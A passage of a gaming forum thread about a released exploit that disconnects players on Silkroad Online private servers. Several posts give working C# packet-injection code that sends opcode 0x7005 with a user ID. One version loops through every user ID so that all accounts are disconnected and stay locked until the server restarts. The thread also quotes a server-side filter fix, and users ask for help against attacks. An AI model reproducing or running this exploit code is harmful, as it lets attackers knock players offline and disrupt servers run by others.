Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Silkroad Online > SRO Private Server > SRO PServer Guides & Releases
You last visited: Today at 09:19

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Release] Disconnect players exploit found by IWA

Discussion on [Release] Disconnect players exploit found by IWA within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

Reply
 
Old 02/04/2017, 16:00   #16
 
ILowe's Avatar
 
elite*gold: 0
Join Date: Mar 2012
Posts: 677
Received Thanks: 29
Quote:
Originally Posted by ramy_11_1 View Post
he said already!

It does not work Can you make a video sample?
ILowe is offline  
Old 02/04/2017, 16:52   #17
 
ramy_11_1's Avatar
 
elite*gold: 0
Join Date: Feb 2013
Posts: 65
Received Thanks: 37
Quote:
Originally Posted by ILowe View Post
It does not work Can you make a video sample?
try to use it on a specific jid
something like this

PHP Code:
if (_pck.Opcode == 0xB007// server opcode
{
    if (
_pck.ReadUInt8() == 2)
    {
        
Packet test = new Packet(0x7005);
        
test.WriteUInt32(1401); // jid
        
test.WriteUInt8(0x04);
        
m_RemoteSecurity.Send(test); // Send to server
    
}

it works on characters list opcode when it comes from S > C
then you can send the exploit packet before you select a character.

you can send it by a specific jid, or you can create a loop function to
start from jid = 1 then jid++ to unlimit
ramy_11_1 is offline  
Thanks
1 User
Old 02/05/2017, 20:01   #18
 
ILowe's Avatar
 
elite*gold: 0
Join Date: Mar 2012
Posts: 677
Received Thanks: 29
dont work br
ILowe is offline  
Old 02/06/2017, 00:16   #19
 
Evaron's Avatar
 
elite*gold: 0
Join Date: Jun 2016
Posts: 12
Received Thanks: 3
nice one
Evaron is offline  
Old 02/22/2017, 18:38   #20
 
elite*gold: 0
Join Date: Nov 2011
Posts: 14
Received Thanks: 0
How to fix??
heha1 is offline  
Old 02/26/2017, 05:24   #21
 
elite*gold: 0
Join Date: Nov 2016
Posts: 21
Received Thanks: 0
HELP PLS

Quote:
Originally Posted by ramy_11_1 View Post
Another fix method :

Code:
#region Logout - Restart Packet
if (packet.Opcode == 0x7005)
{
	// DC Exploit Check!
	if (string.IsNullOrEmpty(Charname))
	{
		Methods.AddLog("Character list packet exploit detected, Disconnect..", Color.Red);
		this.Disconnect();
		continue;
	}

	// Double Check!
	if (bytes.Length > 1)
	{
		Methods.AddLog("Character list packet exploit detected, Disconnect..", Color.Red);
		this.Disconnect();
		continue;
	}

	int type = packet.ReadInt8();

	// here we go!
	// logout delay or any shits
}
#endregion

Hey, how do I apply the correction method?
Ami is attacking the server with that.
Any guide

Quote:
Originally Posted by ​Goofie​ View Post
Hello,

How it works:
  • Inject packet in char screen.
  • Shard will send response to agent and DC the UserJID.
  • Must be sent at char screen or it wont work.
  • People cannot login again until files are restarted, bugs the account.

Packet structure:
Code:
0x7005
uint UserJID
byte 4
Example exploit structure:
Code:
Server->Client
if(_pck.Opcode == 0xB007) // server opcode
{
    if(_pck.ReadUInt8() == 2)
    {
        UInt32 jid = 0;
        while (true)
        {
            Packet test = new Packet(0x7005);
            test.WriteUInt32(jid);
            test.WriteUInt8(0x04);
            m_RemoteSecurity.Send(test); // Send to server
            jid++;
            Thread.Sleep(50);
            Console.WriteLine($"UserJID: {jid} fakubic");
        }
    }
}
Download exploit:


How is it used?
Does anyone guide?
GMCreative is offline  
Old 02/26/2017, 14:38   #22
 
elite*gold: 0
Join Date: Nov 2015
Posts: 10
Received Thanks: 1
how to fix?
truonggiang is offline  
Old 02/26/2017, 15:12   #23
 
KingDollar's Avatar
 
elite*gold: 857
Join Date: Dec 2013
Posts: 857
Received Thanks: 679
Quote:
Originally Posted by truonggiang View Post
how to fix?
you can use navifilter
KingDollar is offline  
Old 02/26/2017, 15:20   #24
 
blapanda's Avatar
 
elite*gold: 0
Join Date: Jul 2009
Posts: 1,860
Received Thanks: 757
Quote:
Originally Posted by Alexiuns* View Post
you can use navifilter
And Goofie No. 2 raises from the ashes ...
blapanda is offline  
Thanks
1 User
Old 02/26/2017, 15:57   #25
 
KingDollar's Avatar
 
elite*gold: 857
Join Date: Dec 2013
Posts: 857
Received Thanks: 679
Quote:
Originally Posted by blapanda View Post
And Goofie No. 2 raises from the ashes ...
i don't i'm trying to help community
KingDollar is offline  
Old 02/27/2017, 01:45   #26
 
elite*gold: 0
Join Date: Nov 2015
Posts: 10
Received Thanks: 1
I can not boot the server with navifilter. I'm used supermike

[IMG=expandable: 1][/IMG]

i don't use navifilter
truonggiang is offline  
Old 02/27/2017, 10:02   #27
 
elite*gold: 0
Join Date: Jun 2013
Posts: 53
Received Thanks: 1
help !!!!!! How to fix??
hieulovehoa is offline  
Old 02/27/2017, 16:32   #28
 
B1Q's Avatar
 
elite*gold: 350
Join Date: Aug 2015
Posts: 1,999
Received Thanks: 1,184
Quote:
Originally Posted by Alexiuns* View Post
i don't i'm trying to help community
that's what goofie said
B1Q is offline  
Thanks
2 Users
Old 03/12/2017, 23:49   #29
 
first_master's Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 25
Received Thanks: 8
Quote:
Originally Posted by magicanoo View Post
What the ****? are you incapable of reading 3 lines of code?
kk
first_master is offline  
Old 03/13/2017, 03:10   #30
 
elite*gold: 0
Join Date: Jun 2013
Posts: 53
Received Thanks: 1
help !!!!!! How to fix??
hieulovehoa is offline  
Reply


Similar Threads Similar Threads
NEW HACK DISCONNECT PLAYERS FOR EGY ?
08/03/2015 - Conquer Online 2 - 15 Replies
They know something that disconnects the other players only with the person giving you whisper? this has been going on online 2.0 recentemento conquers, if they become aware of something let me know please. Thanks!
Disconnect Players
05/21/2012 - S4 League - 3 Replies
There was this person named Flooow8 who could disconnect every player in the round. If you know how please show me.
Disconnect other players
01/06/2007 - WoW Exploits, Hacks, Tools & Macros - 20 Replies
1) get an empty mug from the table 2) fill it 3) get an empty mug from the table 4) fill it you should now have 2 filled mugs trade a person, i prefer noobs as they will always accept put in some cash in the trade window, and 2x a filled mug when you both hit accept, he will get a disconnect and you keep the money Why?



All times are GMT +2. The time now is 09:19.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.